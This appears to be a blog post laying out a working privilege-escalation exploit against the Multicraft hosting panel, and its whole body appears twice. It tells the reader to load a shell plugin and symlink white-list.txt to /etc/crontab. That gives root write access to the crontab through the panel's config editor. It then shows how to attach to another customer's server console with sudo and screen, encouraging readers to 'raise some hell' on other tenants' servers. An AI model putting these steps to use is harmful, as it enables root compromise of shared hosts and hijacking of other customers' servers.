Multicraft remote authenticated root exploit
Can be used to leverage console access, as well as "force op" oneself on any server hosted on the same provider as you.
Actually doing this exploit may cost you money and time!!!
1. Obtain Multicraft panel account on the same hosting provider as the target
2. Load a shell plugin (easy to code, and I'm sure there's at least 1 public one)
3. Connect to Bukkit server with shell plugin loaded
4. execute this:
rm white-list.txt
ln -s /etc/crontab white-list.txt
5. Go back to the panel, click Config Files
6. Edit white-list.txt
7. You now have write access, as root, to the system crontab. Raise some hell.
NOTE: The built in editor uses Windows line endings. You'll need a Firefox/Chrome addon like Tamper Data to change these to "normal"
"\n" instead of "\r\n" (%0A, not %0D%0A).
In order to actually get op on the target server, from here on out, we'll need to not be retards. Run this after becoming root:
sudo -u (target) screen -x
You should now be in their console.
Can be used to leverage console access, as well as "force op" oneself on any server hosted on the same provider as you.
Actually doing this exploit may cost you money and time!!!
1. Obtain Multicraft panel account on the same hosting provider as the target
2. Load a shell plugin (easy to code, and I'm sure there's at least 1 public one)
3. Connect to Bukkit server with shell plugin loaded
4. execute this:
rm white-list.txt
ln -s /etc/crontab white-list.txt
5. Go back to the panel, click Config Files
6. Edit white-list.txt
7. You now have write access, as root, to the system crontab. Raise some hell.
NOTE: The built in editor uses Windows line endings. You'll need a Firefox/Chrome addon like Tamper Data to change these to "normal"
"\n" instead of "\r\n" (%0A, not %0D%0A).
In order to actually get op on the target server, from here on out, we'll need to not be retards. Run this after becoming root:
sudo -u (target) screen -x
You should now be in their console.
No comments:
Post a Comment